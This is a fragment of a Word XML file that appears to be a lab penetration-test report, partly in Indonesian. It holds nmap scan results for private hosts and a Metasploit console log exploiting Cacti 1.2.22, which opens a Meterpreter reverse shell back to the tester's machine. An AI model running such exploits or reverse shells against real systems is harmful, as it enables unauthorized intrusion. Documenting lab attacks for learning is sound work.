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26 June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10.33.102.212</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Wed Jun 26 18:37:07 2024 as: nmap -sV -sC -Pn --script http-title -iL targets.txt -oN nmap_results.txt</w:t>
        <w:br/>
        <w:t>Nmap scan report for 10.33.102.225</w:t>
        <w:br/>
        <w:t>Host is up (0.00083s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Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel</w:t>
        <w:br/>
        <w:br/>
        <w:t>Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .</w:t>
        <w:br/>
        <w:t># Nmap done at Wed Jun 26 18:37:15 2024 -- 1 IP address (1 host up) scanned in 7.85 seconds</w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br/>
        <w:br/>
        <w:t>Hasil pemindaian menunjukkan bahwa pada alamat IP 10.33.102.212:</w:t>
        <w:br/>
        <w:t>- Port 22/tcp terbuka dengan layanan SSH menggunakan OpenSSH versi 8.2p1 pada Ubuntu.</w:t>
        <w:br/>
        <w:t>- Port 80/tcp terbuka dengan layanan HTTP menggunakan Apache HTTP Server versi 2.4.54 pada Debian, judul halamannya adalah 'Login to Cacti'.</w:t>
        <w:br/>
        <w:t>- Port 8086/tcp terbuka dengan layanan HTTP untuk InfluxDB versi 1.6.4 tanpa judul halaman.</w:t>
        <w:br/>
        <w:t>- Sistem operasi yang terdeteksi adalah Linux.</w:t>
        <w:br/>
        <w:br/>
        <w:t>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r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Metasploit melakukan pemindaian kerentanan pada target sistem dan berhasil mengidentifikasi bahwa alamat IP 10.33.102.212 dan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10.33.102.212 dan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10.33.102.212</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>10.33.102.225</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Running the 'init' command for the database:</w:t>
        <w:br/>
        <w:t>Existing database found, attempting to start it</w:t>
        <w:br/>
        <w:t>Starting database at /home/yoan/snap/metasploit-framework/common/.msf4/db...waiting for server to start.... stopped waiting</w:t>
        <w:br/>
        <w:t>failed</w:t>
        <w:b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Sending stage (1017704 bytes) to 10.33.102.225</w:t>
        <w:br/>
        <w:t>[+] The target appears to be vulnerable. The target is Cacti version 1.2.22</w:t>
        <w:br/>
        <w:t>[*] Trying to bruteforce an exploitable host_id and local_data_id by trying up to 500 combinations</w:t>
        <w:br/>
        <w:t>[*] Enumerating local_data_id values for host_id 1</w:t>
        <w:br/>
        <w:t>[*] Meterpreter session 1 opened (10.33.102.224:4444 -&gt; 10.33.102.225:33320) at 2024-06-26 18:40:26 +0700</w:t>
        <w:br/>
        <w:t>[+] Found exploitable local_data_id 15 for host_id 1</w:t>
        <w:br/>
        <w:t>[*] Sending stage (1017704 bytes) to 10.33.102.225</w:t>
        <w:br/>
        <w:t>[*] Command Stager progress - 100.00% done (1118/1118 bytes)</w:t>
        <w:br/>
        <w:t>resource (exploit_cacti_resource.rc)&gt; sessions -i</w:t>
        <w:br/>
        <w:br/>
        <w:t>Active sessions</w:t>
        <w:br/>
        <w:t>===============</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  Id  Name  Type                 Information          Connection</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --  ----  ----                 -----------          ----------</w:t>
        <w:br/>
        <w:t xml:space="preserve">  1         meterpreter x86/lin  www-data @ 172.24.0  10.33.102.224:4444 -</w:t>
        <w:br/>
        <w:t xml:space="preserve">            ux                   .3                   &gt; 10.33.102.225:3332</w:t>
        <w:br/>
        <w:t xml:space="preserve">                                                      0 (172.24.0.3)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